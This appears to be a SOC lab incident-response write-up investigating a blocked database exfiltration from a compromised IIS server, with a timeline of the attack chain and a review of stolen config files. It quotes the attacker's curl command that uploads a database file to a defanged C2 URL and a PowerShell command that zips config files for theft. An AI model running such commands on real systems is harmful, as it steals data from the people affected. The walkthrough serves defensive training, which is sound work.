# SOCM-01: Database File Exfiltration Attempt Detected ➡ I received the following warning in SIEM system.  ➡ Now I will proceed with investigating and analyzing the incident to find informational evidence to complete the Playbooks. ➡ First, based on the information from the alert, I will answer the 5W1H questions. * **Alert / Rule**: Database File Exfiltration Attempt Detected * **Source**: DEV-SERVER-01 (192.168.15.4) **Destination**: 185.203.112.50 (c[.]elhn1m[.]io) * **Timestamp**: 21 Jan 2026, 4:09PM * **Action**: blocked * **Severity**: critical * **Artifact / IOC**: URL, domain, hash, process, mailbox, … * **C2**: hxxps[://]c[.]elhn1m[.]io/upload * File exfiltrated: FinovaDB.mdf * Destination IP: 185.203.112.50 * Process involved: curl.exe * Command-line: curl -X POST --data-binary @C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\FinovaDB.mdf hxxps[://]c[.]elhn1m[.]io/upload * ParentProcess=w3wp.exe * **Context**: EDR detected suspicious attempt to copy and exfiltrate database file FinovaDB.mdf from DEV-SERVER-01 (192.168.15.4). ### Step 1: TRIAGE: What is the IP address of the compromised server mentioned in this alert? ➡ Based on the information available in the alert, I was able to answer the first two questions. ✅ **Answer:** 192.168.15.4 ### Step 2: TRIAGE: What is the name of the database file that was targeted for exfiltration? ✅ **Answer:** FinovaDB.mdf ---  ### Step 3: CORRELATE: Check EDR logs - which process attempted to exfiltrate the database file? ➡ To identify the information in this step, we will need to access EDR to see which processes on the server have malicious commands. ✅ **Answer:** curl.exe ### Step 4: CORRELATE: What is the destination URL where the attacker attempted to send the database file? ➡ Following step 3, I can see in the command a C2 server that the attacker is trying to exfiltrated data to. ✅ **Answer:** hxxps[://]c[.]elhn1m[.]io/upload ### Step 5: ROOT CAUSE: What is the parent process of the curl.exe process that executed the exfiltration command? Check Process History to identify how the command was spawned. ➡ By monitoring the EDR from previous steps, I knowed that the curl.exe process was being compromised, and based on the traceback, I could identify the parent process. ✅ **Answer:** w3wp.exe (Worker Process of IIS) --- ### Step 6: ROOT CAUSE: Which endpoint was used to execute the exfiltration command? Check IIS logs for suspicious endpoint activity around the alert time, correlating with the parent process identified in step 5. ➡ Let's continue searching for the root cause of why the attacker was able to remotely execute commands on the IIS web server. ➡ I accessed log management and searched for keywords related to the being extracted FinovaDB.mdf file. I discovered a log entry containing a malicious command at the exact time the alert appeared. ➡ From this, I identified the compromised endpoint and a webshell present on the server.  ✅ **Answer:** /assets/cache.aspx > Additional Information analyzed: Before moving on to the next step, I need to dig deeper into why there is a webshell on the server and why an attacker can bypass the WAF to upload that webshell. > Upon further investigation on the 20th, I observed the first signs of webshell activity. >    > At 9:12 AM on the 20th, an EDR log was created with the event name "suspicious file create" and executed commands such as whoami and dir. > However, before that, there were many requests to the web server related to SQL injection attacks, but they were all blocked by WAF. Nevertheless, there are two suspicious POST method logs with payloads that were executed and allowed by WAF; this suggests that the attacker can upload the cache.aspx file on the server. >  >  ➡ Hypothesis: At 9:08 AM on January 20, 2026, the IIS-hosted web application was successfully compromised through an unsafe deserialization vulnerability in a `Node.js` backend using React Server Components `(CVE-2025-55182) - React2Shell`. The attacker delivered a `crafted JSON payload` to the /api/update/ endpoint, `abusing prototype pollution techniques` to `access the Function constructor` and execute arbitrary server-side code with SYSTEM privileges. >➡ Shortly after successful exploitation, the attacker validated `remote code execution` by invoking reconnaissance commands such as whoami through a process spawned by `node.exe`. This activity was confirmed by Windows Security Event ID 4688, which showed node.exe spawning cmd.exe under the SYSTEM account. >➡ Following initial command execution, the attacker continued leveraging the compromised Node.js process to execute additional payloads, including encoded commands intended to evade endpoint detection controls. As a result, a `webshell (cache.aspx)` was uploaded to the server, enabling `persistent remote command execution` and long-term control over the system. All observed malicious activity originated from the Node.js backend process (node.exe as the parent process) spawning Windows command shells (cmd.exe as the child process) and executing under the SYSTEM security context. > > ### Step 7: ROOT CAUSE: What is the external attacker IP address making requests to execute commands? ➡ Based on the information I've gathered so far, I can easily identify the attacker's IP address. ✅ **Answer:** 185.77.12.34 ### Step 8: INVESTIGATION: Based on its location and behavior, what type of functionality does the /assets/cache.aspx file provide? ✅ **Answer:** web shell ---  ### Step 9: TIMELINE: Before the exfiltration attempt, what directory listing command was executed to discover the database file? ➡ Continuing to use SIEM to search for keywords related to "Dir," I found that the attacker executed 5 list commands related to MS SQL Server databases and others. ✅ **Answer:** dir C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA ### Step 10: TIMELINE: What is the IIS request ID for the directory listing command that discovered the database file? ➡ Looking at the request ID field in the logs will help identify the information. ✅ **Answer:** 1000145302 ---  ### Step 11: TIMELINE: Earlier in the attack chain, what PowerShell command was used to create a zip archive? ➡ In the previous step, I found many "Dir" commands executed by the attacker, including a command to list files in the IIS web configuration folder. The attacker then proceeded to read the files `app.config, appsettings.json, connectionstrings.config, database.config, secrets.json, and web.config`. Once identified files containing sensitive information, the attacker compressed them into a single zip file named config_backup.zip. ✅ **Answer:** Compress-Archive -Path C:\inetpub\wwwroot\config\* -DestinationPath C:\Users\Public\config_backup.zip ---  ### Step 12: INVESTIGATION: What directory was explored before the zip file was created? Check IIS logs for directory listing commands. ✅ **Answer:** C:\inetpub\wwwroot\config ---        ### Step 13: INVESTIGATION: What files were collected and exfiltrated in the config_backup.zip? List all filenames in alphabetical order, separated by commas. ➡ Based on the information analyzed in the previous steps, I can easily answer the question in this step and have one more piece of information: the config_backup.zip file has been successfully exfiltrated by the attacker to C2. ✅ **Answer:** appsettings.json, connectionstrings.config, database.config, secrets.json, web.config ---  ### Step 14: IOC: Was the database file exfiltration attempt successful or blocked? ➡ Based on the WAF logs, the attempt to exfiltrated DB files to C2 has been successfully blocked. ✅ **Answer:** BLOCKED --- ### Step 15: ASSESSMENT: Based on your investigation, what is your final assessment of this alert? ➡ Confirmed this was a chain attack by the attacker that successfully compromised the web server. ✅ **Answer:** True Positive - Blocked Database Exfiltration Attempt --- ### Step 16: CONTAINMENT: What immediate containment actions should be taken? ➡ Isolate: DEV-SERVER-01 (192.168.15.4) ➡ Remove: webshell ➡ Block IP: 185.77.12.34 ✅ **Answer:** Isolate server - remove entry point - block domain ## ==NOTE: Please read SOCM-02 & 03 for mor context== ## TIMELINE: The Overall Picture of The Chain Attack ### Summary: 1. Time of first attack recorded: 20 Jan 2026, 9:00 AM 1. Time of last attack recorded: 21 Jan 2026, 10:32PM 1. Target Machine: DEV-SERVER-01 (192.168.15.4) 1. Attacker's IP address: 185.77.12.34 1. C2 Server: 185.203.112.50 1. Related attack techniques: SQLi, SSRF, webshell, C2, Lateral movement, Port scanning, Beaconing 1. Security vulnerability: React2shell 1. Total number of alerts: 3 ### Detail: | Timestamp | Event Description | |---------|------------------| | **20 Jan 2026, 9:00 AM** | An attack against the web server was detected using common techniques such as **SQL Injection (SQLi), Server-Side Request Forgery (SSRF), Path Traversal, Cross-Site Scripting (XSS), and LDAP Injection**. These web exploitation attempts originated from IP address **185.77.12.34** and occurred within a **4-minute window**. The targeted endpoint was **/api/update**. | | **20 Jan 2026, 9:08 AM** | Logs recorded malicious payloads that successfully **bypassed the WAF and achieved command execution**. The attacker likely completed reconnaissance and identified the web stack as **React and NestJS**, then exploited a newly disclosed vulnerability **React2Shell (CVE-2025-55182)**. Evidence includes log artifacts such as **('child_process').execSync**, and Windows logs confirming **node.exe spawning cmd.exe** to execute commands. | | **20 Jan 2026, 9:12 AM** | The EDR detected that the attacker successfully created a **cache.aspx webshell**. However, due to issues in log collection, the payload responsible for uploading the webshell was only observed at **9:32 AM**. The webshell was located in the **assets directory** (requires verification with the relevant team). | | **20 Jan 2026, 9:32 AM** | Payloads were observed downloading the **webshell** and **bash.exe** from **hxxps://raw[.]githubusercontent[.]com/elhnim-cos**. The webshell was used for direct command execution on the system, while **bash.exe** functioned as a beaconing agent, periodically signaling connection status back to the C2 server approximately every **30 minutes** (**c[.]elhn1m[.]io – 185.203.112.50**). As a result, **SOCM-03 alert** was generated. Beaconing activity persisted throughout **20 and 21 January**. | | **21 Jan 2026, 10:00 AM** | Logs indicated that the attacker accessed and read files within the **web application’s config directory** to search for sensitive information. | | **21 Jan 2026, 2:00 PM** | The attacker downloaded a **cryptomining tool (xmrig.exe)** and stored it as **C:\ProgramData\svchost32.exe**. | | **21 Jan 2026, 4:00 PM** | The attacker executed the **dir** command to enumerate files, re-accessed the web application’s **config directory**, and compressed configuration files (**appsettings.json, database.config, secrets.json, web.config, connectionstrings.config**) into **C:\Users\Public\config_backup.zip**. | | **21 Jan 2026, 4:07 PM** | The attacker successfully **exfiltrated config_backup.zip to the C2 server**. This action was not blocked due to the absence of an appropriate EDR detection rule. | | **21 Jan 2026, 4:08 PM** | The attacker used **dir** to locate and read **MSSQL database files** at **C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA**, and attempted to exfiltrate **FinovaDB.mdf** to the C2 server. This action was **blocked by EDR**, triggering **SOCM-01 alert**. | | **21 Jan 2026, 5:55 PM** | The attacker downloaded **nmap** and scanned multiple hosts across the internal network on various ports. A host **192.168.15.1** with **port 3389 (RDP)** open was identified. At **6:02 PM**, the attacker attempted to log in using the **Administrator** account, but the attempt was **blocked by EDR**, resulting in **SOCM-02 alert**. | ## Sếp hỏi: ### Attacker trích xuất .zip ra ngoài, sếp muốn biết những file đó nội dung là gì, có cần phải thay đổi gì cấu hình để cho hệ thống an toàn không? The NSM detected the attack and successfully captured PCAP files covering the entire process in which the attacker attempted to exfiltrate files.    Dưới đây là **bản dịch tiếng Anh**, **chỉ dịch nguyên nội dung bạn gửi**, không bổ sung hay diễn giải thêm. --- The **NSM** detected the attack and successfully captured **PCAP files** covering the entire process in which the attacker attempted to exfiltrate files. ### 1. `secrets.json` **Content** This file contains **sensitive information**: * **JWT Secret Key**: used to sign and validate authentication tokens. * **API Keys**: Payment Gateway, Email (SendGrid), SMS (Twilio). * **Encryption Keys**: used to encrypt data and tokens. * **Database Admin Credentials**: database administrator username and password. **Risk Assessment** * This file represents a **single point of compromise**, which may lead to loss of control over the entire system. * **Hard-coded secrets** are present in the configuration file. **Recommendations** * Do not deploy `secrets.json` in production environments. * Rotate: * JWT Secret Key * API keys * Database admin password --- ### 2. `appsettings.json` **Content** * Logging level * Application information * Session timeout * Feature flags (2FA, rate limiting, audit logging) --- ### 3. `connectionstrings.config` **Content** * Stores **database connection strings**, including: * Server * Database * Username / Password * SSL options **Risks** * Password stored in plaintext * Encryption not enabled (`Encrypt=True` is missing) * Certificate verification not enforced **Recommendations** * Do not hard-code passwords ``` Encrypt=True; TrustServerCertificate=False; ``` --- ### 4. `database.config` **Content** * Database-related logic configuration: * Pooling * Timeout * Provider * Migration / schema --- ### 5. `web.config` **Content** * The **most critical file on IIS** * Controls: * Request filtering * Modules * Error handling * Security headers --- ### Items to Review / Improve * Block direct access to: `*.json`, `*.config` * Disable: * Directory browsing * Detailed error messages * Enable security headers: * `X-Frame-Options` * `X-Content-Type-Options` * `Content-Security-Policy` * Restrict HTTP verbs (GET, POST).